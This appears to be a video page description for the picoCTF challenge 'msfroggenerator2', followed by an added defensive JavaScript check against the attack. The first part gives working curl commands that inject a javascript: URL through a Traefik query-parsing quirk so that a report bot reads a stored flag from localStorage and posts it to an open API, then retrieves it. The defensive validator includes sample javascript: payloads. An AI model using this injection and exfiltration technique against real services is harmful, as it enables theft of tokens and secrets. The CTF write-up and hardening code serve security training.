
picoCTF msfroggenerator2

3.5K views
May 18, 2023
6:03

This Traefik GitHub issue (https://github.com/traefik/traefik/issues/9164) lets us replace the url parameter with JavaScript that posts the flag to the reports. An open API then leaks the flag to us.

port=64305
curl --globoff 'http://saturn.picoctf.net:'$port'/report?id=;url=javascript:fetch("/api/reports/add",{method:"POST",headers:{"Content-Type":"application/json","Authorization":`Bearer%20${localStorage.getItem('\''flag'\'')}`},body:JSON.stringify({screenshot:localStorage.getItem('\''flag'\'')})})' -v
sleep 4
curl 'http://saturn.picoctf.net:'$port'/api/reports/get'
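
A defensive check for the kind of request shown above, as an added example that is not taken from the video or from the challenge's code. It assumes a report handler that receives `id` and `url` query parameters and loads `url` in a browser; the function name `checkReportQuery` and the sample queries are constructed for illustration.

```javascript
// Hypothetical hardening for a report endpoint that hands a "url" query
// parameter to a headless browser. Names and rules here are assumptions.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

function checkReportQuery(rawQuery) {
  // 1. Refuse a raw ';' in the query string: some parsers treat it as a
  //    parameter separator and others as data, so a proxy and the backend
  //    can disagree about what "url" is. Legitimate values can send %3B.
  if (rawQuery.includes(";")) {
    return { ok: false, reason: "ambiguous ';' in query string" };
  }
  const params = new URLSearchParams(rawQuery);
  // 2. Require exactly one copy of each parameter so that no layer can
  //    pick a different occurrence than the one that was validated.
  for (const name of ["id", "url"]) {
    if (params.getAll(name).length !== 1) {
      return { ok: false, reason: `expected exactly one '${name}'` };
    }
  }
  // 3. Parse the target as an absolute URL and allow only web schemes,
  //    which rejects javascript:, data:, file: and similar.
  let target;
  try {
    target = new URL(params.get("url"));
  } catch {
    return { ok: false, reason: "url is not an absolute URL" };
  }
  if (!ALLOWED_SCHEMES.has(target.protocol)) {
    return { ok: false, reason: `scheme ${target.protocol} not allowed` };
  }
  return { ok: true, url: target.href };
}

// Constructed sample queries (not captured traffic).
const samples = [
  "id=abc&url=https%3A%2F%2Fexample.com%2Fpage",
  "id=;url=javascript:fetch(1)",
  "id=abc&url=javascript:alert(1)",
  "id=abc&url=https://example.com/&url=javascript:alert(1)",
];
for (const q of samples) {
  console.log(q, "->", JSON.stringify(checkReportQuery(q)));
}
```

The check only covers the request parsing side; the unauthenticated reports API mentioned in the description needs its own access control.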
